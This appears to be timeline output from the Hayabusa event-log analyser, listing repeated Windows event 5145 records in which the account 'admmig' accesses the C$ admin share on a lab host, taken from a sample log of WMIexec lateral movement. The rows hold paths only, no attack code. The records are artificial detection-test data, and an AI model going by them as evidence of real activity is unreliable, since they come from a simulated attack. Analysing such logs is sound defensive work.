0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 
10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | 
LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 